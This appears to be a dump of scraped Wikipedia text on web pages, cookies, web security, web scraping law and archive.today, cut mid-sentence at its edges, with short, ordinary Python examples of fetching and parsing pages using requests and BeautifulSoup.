(HTTP) to make such requests to the web server. A static web page is delivered exactly as stored, as web content in the web server's file system. In contrast, a dynamic web page is generated by a web application, usually driven by server-side software. 
Dynamic web pages are used when each user may require completely different information, for example, bank websites, web email etc. A static web page (sometimes called a flat page stationary page) is a web page that is delivered to the user exactly as stored, in contrast to dynamic web pages which are generated by a web application. Consequently, a static web page displays the same information for all users, from all contexts, subject to modern capabilities of a web server to negotiate content-type or language of the document where such versions are available and the server is configured to do so. A server-side dynamic web page is a web page whose construction is controlled by an application server processing server-side scripts. In server-side scripting, parameters determine how the assembly of every new web page proceeds, including the setting up of more client-side processing. A client-side dynamic web page processes the web page using JavaScript running in the browser. JavaScript programs can interact with the document via Document Object Model, or DOM, to query page state and alter it. The same client-side techniques can then dynamically update or change the DOM in the same way. A dynamic web page is then reloaded by the user or by a computer program to change some variable content. The updating information could come from the server, or from changes made to that page's DOM. This may or may not truncate the browsing history or create a saved version to go back to, but a dynamic web page update using Ajax technologies will neither create a page to go back to nor truncate the web browsing history forward of the displayed page. Using Ajax technologies the end user gets one dynamic page managed as a single page in the web browser while the actual web content rendered on that page can vary. The Ajax engine sits only on the browser requesting parts of its DOM, the DOM, for its client, from an application server. Dynamic HTML, or DHTML, is the umbrella term for technologies and methods used to create web pages that are not static web pages, though it has fallen out of common use since the popularization of AJAX, a term which is now itself rarely used. citation needed Client-side-scripting, server-side scripting, or a combination of these make for the dynamic web experience in a browser. JavaScript is a scripting language that was initially developed in 1995 by Brendan Eich, then of Netscape, for use within web pages. 47 The standardised version is ECMAScript. 47 To make web pages more interactive, some web applications also use JavaScript techniques such as Ajax (asynchronous JavaScript and XML). Client-side script is delivered with the page that can make additional HTTP requests to the server, either in response to user actions such as mouse movements or clicks, or based on elapsed time. The server's responses are used to modify the current page rather than creating a new page with each response, so the server needs only to provide limited, incremental information. Multiple Ajax requests can be handled at the same time, and users can interact with the page while data is retrieved. Web pages may also regularly poll the server to check whether new information is available. 48 A website 49 is a collection of related web resources including web pages, multimedia content, typically identified with a common domain name, and published on at least one web server. Notable examples are wikipedia.org, google.com, and amazon.com. 
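Client-side dynamic pages like the ones described above are often filled in by Ajax calls to a JSON endpoint, and scraping that endpoint directly is usually simpler than rendering the page. A hedged sketch; the endpoint URL and response structure are entirely hypothetical:

# Fetch the JSON endpoint behind a dynamic page (endpoint URL and fields are hypothetical).
import requests

api_url = "https://example.org/api/items?page=1"
data = requests.get(api_url, timeout=10).json()
for item in data.get("items", []):
    print(item)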
A website may be accessible via a public Internet Protocol (IP) network, such as the Internet, or a private local area network (LAN), by referencing a uniform resource locator (URL) that identifies the site. Websites can have many functions and can be used in various fashions; a website can be a personal website, a corporate website for a company, a government website, an organization website, etc. Websites are typically dedicated to a particular topic or purpose, ranging from entertainment and social networking to providing news and education. All publicly accessible websites collectively constitute the World Wide Web, while private websites, such as a company's website for its employees, are typically a part of an intranet. Web pages, which are the building blocks of websites, are documents, typically composed in plain text interspersed with formatting instructions of Hypertext Markup Language (HTML, XHTML). They may incorporate elements from other websites with suitable markup anchors. Web pages are accessed and transported with the Hypertext Transfer Protocol (HTTP), which may optionally employ encryption (HTTP Secure, HTTPS) to provide security and privacy for the user. The user's application, often a web browser, renders the page content according to its HTML markup instructions onto a display terminal. Hyperlinking between web pages conveys to the reader the site structure and guides the navigation of the site, which often starts with a home page containing a directory of the site web content. Some websites require user registration or subscription to access content. Examples of subscription websites include many business sites, news websites, academic journal websites, gaming websites, file-sharing websites, message boards, web-based email, social networking websites, websites providing real-time price quotations for different types of markets, as well as sites providing various other services. End users can access websites on a range of devices, including desktop and laptop computers, tablet computers, smartphones and smart TVs. A web browser (commonly referred to as a browser) is a software user agent for accessing information on the World Wide Web. To connect to a website's server and display its pages, a user needs to have a web browser program. This is the program that the user runs to download, format, and display a web page on the user's computer. In addition to allowing users to find, display, and move between web pages, a web browser will usually have features like keeping bookmarks, recording history, managing cookies (see below), and home pages and may have facilities for recording passwords for logging into web sites. The most popular browsers are Chrome, Firefox, Safari, Internet Explorer, and Edge. A Web server is server software, or hardware dedicated to running said software, that can satisfy World Wide Web client requests. A web server can, in general, contain one or more websites. A web server processes incoming network requests over HTTP and several other related protocols. The primary function of a web server is to store, process and deliver web pages to clients. 50 The communication between client and server takes place using the Hypertext Transfer Protocol (HTTP). Pages delivered are most frequently HTML documents, which may include images, style sheets and scripts in addition to the text content. 
A user agent, commonly a web browser or web crawler, initiates communication by making a request for a specific resource using HTTP and the server responds with the content of that resource or an error message if unable to do so. The resource is typically a real file on the server's secondary storage, but this is not necessarily the case and depends on how the webserver is implemented. While the primary function is to serve content, full implementation of HTTP also includes ways of receiving content from clients. This feature is used for submitting web forms, including uploading of files. Many generic web servers also support server-side scripting using Active Server Pages (ASP), PHP (Hypertext Preprocessor), or other scripting languages. This means that the behaviour of the webserver can be scripted in separate files, while the actual server software remains unchanged. Usually, this function is used to generate HTML documents dynamically ("on-the-fly") as opposed to returning static documents. The former is primarily used for retrieving or modifying information from databases. The latter is typically much faster and more easily cached but cannot deliver dynamic content. Web servers can also frequently be found embedded in devices such as printers, routers, webcams and serving only a local network. The web server may then be used as a part of a system for monitoring or administering the device in question. This usually means that no additional software has to be installed on the client computer since only a web browser is required (which now is included with most operating systems). An HTTP cookie (also called web cookie, Internet cookie, browser cookie, or simply cookie) is a small piece of data sent from a website and stored on the user's computer by the user's web browser while the user is browsing. Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items added in the shopping cart in an online store) or to record the user's browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past). They can also be used to remember arbitrary pieces of information that the user previously entered into form fields such as names, addresses, passwords, and credit card numbers. Cookies perform essential functions in the modern web. Perhaps most importantly, authentication cookies are the most common method used by web servers to know whether the user is logged in or not, and which account they are logged in with. Without such a mechanism, the site would not know whether to send a page containing sensitive information or require the user to authenticate themselves by logging in. The security of an authentication cookie generally depends on the security of the issuing website and the user's web browser, and on whether the cookie data is encrypted. Security vulnerabilities may allow a cookie's data to be read by a hacker, used to gain access to user data, or used to gain access (with the user's credentials) to the website to which the cookie belongs (see cross-site scripting and cross-site request forgery for examples). 51 Tracking cookies, and especially third-party tracking cookies, are commonly used as ways to compile long-term records of individuals' browsing histories a potential privacy concern that prompted European 52 and U.S. lawmakers to take action in 2011. 
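The row above explains that authentication cookies are how a server remembers a logged-in user. When scraping pages behind a login, a requests.Session stores those cookies and resends them automatically; the login URL and form field names below are hypothetical:

# Reuse authentication cookies across requests with a session
# (login URL and form field names are hypothetical).
import requests

session = requests.Session()
session.post("https://example.org/login",
             data={"username": "alice", "password": "secret"},
             timeout=10)
print("Cookies set by the server:", session.cookies.get_dict())
profile = session.get("https://example.org/profile", timeout=10)  # cookies sent automatically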
53 54 European law requires that all websites targeting European Union member states gain "informed consent" from users before storing non-essential cookies on their device. Google Project Zero researcher Jann Horn describes ways cookies can be read by intermediaries, like Wi-Fi hotspot providers. When in such circumstances, he recommends using the browser in private browsing mode (widely known as Incognito mode in Google Chrome). 55 A web search engine or Internet search engine is a software system that is designed to carry out web search (Internet search), which means to search the World Wide Web in a systematic way for particular information specified in a web search query. The search results are generally presented in a line of results, often referred to as search engine results pages (SERPs). The information may be a mix of web pages, images, videos, infographics, articles, research papers, and other types of files. Some search engines also mine data available in databases or open directories. Unlike web directories, which are maintained only by human editors, search engines also maintain real-time information by running an algorithm on a web crawler. Internet content that is not capable of being searched by a web search engine is generally described as the deep web. The deep web, 56 invisible web, 57 or hidden web 58 are parts of the World Wide Web whose contents are not indexed by standard web search engines. The opposite term to the deep web is the surface web, which is accessible to anyone using the Internet. 59 Computer scientist Michael K. Bergman is credited with coining the term deep web in 2001 as a search indexing term. 60 The content of the deep web is hidden behind HTTP forms, 61 62 and includes many very common uses such as web mail, online banking, and services that users must pay for, and which is protected by a paywall, such as video on demand, some online magazines and newspapers, among others. The content of the deep web can be located and accessed by a direct URL or IP address and may require a password or other security access past the public website page. A web cache is a server computer located either on the public Internet or within an enterprise that stores recently accessed web pages to improve response time for users when the same content is requested within a certain time after the original request. Most web browsers also implement a browser cache by writing recently obtained data to a local data storage device. HTTP requests by a browser may ask only for data that has changed since the last access. Web pages and resources may contain expiration information to control caching to secure sensitive data, such as in online banking, or to facilitate frequently updated sites, such as news media. Even sites with highly dynamic content may permit basic resources to be refreshed only occasionally. Web site designers find it worthwhile to collate resources such as CSS data and JavaScript into a few site-wide files so that they can be cached efficiently. Enterprise firewalls often cache Web resources requested by one user for the benefit of many users. Some search engines store cached content of frequently accessed websites. For criminals, the Web has become a venue to spread malware and engage in a range of cybercrimes, including (but not limited to) identity theft, fraud, espionage and intelligence gathering. 
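The row above notes that a browser may ask only for data that has changed since the last access. That is done with conditional requests; a small sketch with an illustrative URL, assuming the server returns an ETag:

# Conditional re-fetch: ask the server whether the resource changed (URL is illustrative).
import requests

url = "https://example.org/"
first = requests.get(url, timeout=10)
etag = first.headers.get("ETag")

headers = {"If-None-Match": etag} if etag else {}
second = requests.get(url, headers=headers, timeout=10)
if second.status_code == 304:
    print("Not modified - reuse the cached copy")
else:
    print("Content changed - update the cache")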
63 Web-based vulnerabilities now outnumber traditional computer security concerns, 64 65 and as measured by Google, about one in ten web pages may contain malicious code. 66 Most web-based attacks take place on legitimate websites, and most, as measured by Sophos, are hosted in the United States, China and Russia. 67 The most common of all malware threats is SQL injection attacks against websites. 68 Through HTML and URIs, the Web was vulnerable to attacks like cross-site scripting (XSS) that came with the introduction of JavaScript 69 and were exacerbated to some degree by Web 2.0 and Ajax web design that favours the use of scripts. 70 Today as of? by one estimate, 70% of all websites are open to XSS attacks on their users. 71 Phishing is another common threat to the Web. In February 2013, RSA (the security division of EMC) estimated the global losses from phishing at $1.5 billion in 2012. 72 Two of the well-known phishing methods are Covert Redirect and Open Redirect. Proposed solutions vary. Large security companies like McAfee already design governance and compliance suites to meet post 9 11 regulations, 73 and some, like Finjan have recommended active real-time inspection of programming code and all content regardless of its source. 63 Some have argued that for enterprises to see Web security as a business opportunity rather than a cost centre, 74 while others call for "ubiquitous, always-on digital rights management" enforced in the infrastructure to replace the hundreds of companies that secure data and networks. 75 Jonathan Zittrain has said users sharing responsibility for computing safety is far preferable to locking down the Internet. 76 Every time a client requests a web page, the server can identify the request's IP address. Web servers usually log IP addresses in a log file. Also, unless set not to do so, most web browsers record requested web pages in a viewable history feature, and usually cache much of the content locally. Unless the server-browser communication uses HTTPS encryption, web requests and responses travel in plain text across the Internet and can be viewed, recorded, and cached by intermediate systems. Another way to hide personally identifiable information is by using a virtual private network. A VPN encrypts online traffic and masks the original IP address lowering the chance of user identification. When a web page asks for, and the user supplies, personally identifiable information—such as their real name, address, e-mail address, etc. web-based entities can associate current web traffic with that individual. If the website uses HTTP cookies, username, and password authentication, or other tracking techniques, it can relate other web visits, before and after, to the identifiable information provided. In this way, a web-based organization can develop and build a profile of the individual people who use its site or sites. It may be able to build a record for an individual that includes information about their leisure activities, their shopping interests, their profession, and other aspects of their demographic profile. These profiles are of potential interest to marketers, advertisers, and others. Depending on the website's terms and conditions and the local laws that apply information from these profiles may be sold, shared, or passed to other organizations without the user being informed. For many ordinary people, this means little more than some unexpected e-mails in their in-box or some uncannily relevant advertising on a future web page. 
For others, it can mean that time spent indulging an unusual interest can result in a deluge of further targeted marketing that may be unwelcome. Law enforcement, counterterrorism, and espionage agencies can also identify, target, and track individuals based on their interests or proclivities on the Web. Social networking sites usually try to get users to use their real names, interests, and locations, rather than pseudonyms, as their executives believe that this makes the social networking experience more engaging for users. On the other hand, uploaded photographs or unguarded statements can be identified to an individual, who may regret this exposure. Employers, schools, parents, and other relatives may be influenced by aspects of social networking profiles, such as text posts or digital photos, that the posting individual did not intend for these audiences. Online bullies may make use of personal information to harass or stalk users. Modern social networking websites allow fine-grained control of the privacy settings for each posting, but these can be complex and not easy to find or use, especially for beginners. 77 Photographs and videos posted onto websites have caused particular problems, as they can add a person's face to an online profile. With modern and potential facial recognition technology, it may then be possible to relate that face with other, previously anonymous, images, events, and scenarios that have been imaged elsewhere. Due to image caching, mirroring, and copying, it is difficult to remove an image from the World Wide Web. Web standards include many interdependent standards and specifications, some of which govern aspects of the Internet, not just the World Wide Web. Even when not web-focused, such standards directly or indirectly affect the development and administration of websites and web services. Considerations include the interoperability, accessibility and usability of web pages and web sites. Web standards, in the broader sense, consist of the following: Web standards are not fixed sets of rules but are constantly evolving sets of finalized technical specifications of web technologies. 84 Web standards are developed by standards organizations—groups of interested and often competing parties chartered with the task of standardization—not technologies developed and declared to be a standard by a single individual or company. It is crucial to distinguish those specifications that are under development from the ones that already reached the final development status (in the case of W3C specifications, the highest maturity level). There are methods for accessing the Web in alternative mediums and formats to facilitate use by individuals with disabilities. These disabilities may be visual, auditory, physical, speech-related, cognitive, neurological, or some combination. Accessibility features also help people with temporary disabilities, like a broken arm, or ageing users as their abilities change. 85 The Web is receiving information as well as providing information and interacting with society. The World Wide Web Consortium claims that it is essential that the Web be accessible, so it can provide equal access and equal opportunity to people with disabilities. 86 Tim Berners-Lee once noted, "The power of the Web is in its universality. Access by everyone regardless of disability is an essential aspect. 85 Many countries regulate web accessibility as a requirement for websites. 
87 International co-operation in the W3C Web Accessibility Initiative led to simple guidelines that web content authors as well as software developers can use to make the Web accessible to persons who may or may not be using assistive technology. 85 88 The W3C Internationalisation Activity assures that web technology works in all languages, scripts, and cultures. 89 Beginning in 2004 or 2005, Unicode gained ground and eventually in December 2007 surpassed both ASCII and Western European as the Web's most frequently used character encoding. 90 Originally RFC 3986 allowed resources to be identified by URI in a subset of US-ASCII. RFC 3987 allows more characters—any character in the Universal Character Set—and now a resource can be identified by IRI in any language. 91 |
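The caching discussion above notes that a browser may ask a server only for data that has changed since the last access. The same revalidation can be done from Python with the requests library; a minimal sketch, assuming the URL below is only illustrative and that the server actually returns ETag or Last-Modified validators.

import requests

url = "https://en.wikipedia.org/wiki/Web_cache"  # illustrative target

# First fetch: record the validators the server hands back (if any).
first = requests.get(url, timeout=10)
etag = first.headers.get("ETag")
last_modified = first.headers.get("Last-Modified")

# Second fetch: send the validators back so the server can answer 304 Not Modified
# instead of re-sending the full body.
headers = {}
if etag:
    headers["If-None-Match"] = etag
if last_modified:
    headers["If-Modified-Since"] = last_modified

second = requests.get(url, headers=headers, timeout=10)
if second.status_code == 304:
    print("Not modified - a locally cached copy can be reused.")
else:
    print("Content changed or no validators offered; fetched", len(second.content), "bytes")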
134 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-16 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
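The article above describes scraping as two steps: fetching a page and then extracting data from it. A minimal sketch of that fetch-then-extract loop with requests and BeautifulSoup, assuming the URL is only illustrative:

import requests
from bs4 import BeautifulSoup

url = "https://en.wikipedia.org/wiki/Web_scraping"  # illustrative target
response = requests.get(url, timeout=10)
response.raise_for_status()

# Fetching done; extraction step: parse the HTML and pull out selected pieces.
soup = BeautifulSoup(response.text, "html5lib")
title_tag = soup.find("h1")
title = title_tag.get_text(strip=True) if title_tag else "(no title found)"
paragraphs = [p.get_text(" ", strip=True) for p in soup.find_all("p")[:3]]

print(title)
for para in paragraphs:
    print(para[:120], "...")

The extracted strings could then be cleaned and copied into a spreadsheet or loaded into a database, as the article describes.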
135 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Archive.today | archive.today (or archive.is) is a web archiving website founded in 2012 that saves snapshots on demand, and has support for JavaScript-heavy sites such as Google Maps, and Twitter. 3 archive.today records two snapshots: one replicates the original webpage including any functional live links; the other is a screenshot of the page. 4 The identity of its operator is not apparent. 5 Archive.today was founded in 2012. The site originally branded itself as archive.today, but changed the primary mirror to archive.is in May 2015. 6 It began to deprecate the archive.is domain in favor of other mirrors in January 2019. 7 As of 2021, update archive.today had saved about 500 million pages. 5 Archive.today can capture individual pages in response to explicit user requests. 8 9 10 Since its beginning, it has supported crawling pages with URLs containing the now-deprecated hash-bang fragment ( ). 11 Archive.today records only text and images, excluding XML, RTF, spreadsheet (xls or ods) and other non-static content. However, videos for certain sites, like X (formerly Twitter), are saved. 12 It keeps track of the history of snapshots saved, requesting confirmation before adding a new snapshot of an already saved page. 13 14 Pages are captured at a browser width of 1,024 pixels. CSS is converted to inline CSS, removing responsive web design and selectors such as :hover and :active. Content generated using JavaScript during the crawling process appears in a frozen state. 15 HTML class names are preserved inside the old-class attribute. When text is selected, a JavaScript applet generates a URL fragment seen in the browser's address bar that automatically highlights that portion of the text when visited again. Web pages can be duplicated from archive.today to web.archive.org as second-level backup, but archive.today does not save its snapshots in WARC format. The reverse—from web.archive.org to archive.today—is also possible, 16 but the copy usually takes more time than a direct capture. Historically, website owners had the option to opt out of Wayback Machine through the use of the robots exclusion standard (robots.txt), and these exclusions were also applied retroactively. 17 Archive.today does not obey robots.txt because it acts "as a direct agent of the human user. 10 As of 2019, Wayback Machine no longer obeys robots.txt. The research toolbar enables advanced keywords operators, using as the wildcard character. A couple of quotation marks address the search to an exact sequence of keywords present in the title or in the body of the webpage, whereas the insite operator restricts it to a specific Internet domain. 18 Once a web page is archived, it cannot be deleted directly by any Internet user. 19 Removing advertisements, popups or expanding links from archived pages is possible by asking the owner to do it on his blog. 20 While saving a dynamic list, archive.today search box shows only a result that links the previous and the following section of the list (e.g. 20 links for page). 21 The other web pages saved are filtered, and sometimes may be found by one of their occurrences. 13 clarification needed The search feature is backed by Google CustomSearch. If it delivers no results, archive.today attempts to utilize Yandex Search. 22 While saving a page, a list of URLs for individual page elements and their content sizes, HTTP statuses and MIME types is shown. 
This list can only be viewed during the crawling process. One can download archived pages as a ZIP file, except pages archived since 29 November 2019, update when archive.today changed their browser engine from PhantomJS to Chromium. 23 In July 2013, Archive.today began supporting the API of the Memento Project. 24 25 In March 2019, the site was blocked for six months by several internet providers in Australia and New Zealand in the aftermath of the Christchurch mosque shootings in an attempt to limit distribution of the footage of the attack. 26 27 According to GreatFire.org, archive.today has been blocked in mainland China since March 2016, update 28 archive.li since September 2017, update 29 archive.fo since July 2018, update 30 as well as archive.ph since December 2019. update 31 On 21 July 2015, the operators blocked access to the service from all Finnish IP addresses, stating on Twitter that they did this in order to avoid escalating a dispute they allegedly had with the Finnish government. 32 In 2016, the Russian communications agency Roskomnadzor began blocking access to archive.is from Russia. 33 34 Since May 2018 35 36 Cloudflare's 1.1.1.1 DNS service would not resolve archive.today's web addresses, making it inaccessible to users of the Cloudflare DNS service. Both organizations claimed the other was responsible for the issue. Cloudflare staff stated that the problem was on archive.today's DNS infrastructure, as its authoritative nameservers return invalid records when Cloudflare's network systems made requests to archive.today. archive.today countered that the issue was due to Cloudflare requests not being compliant with DNS standards, as Cloudflare does 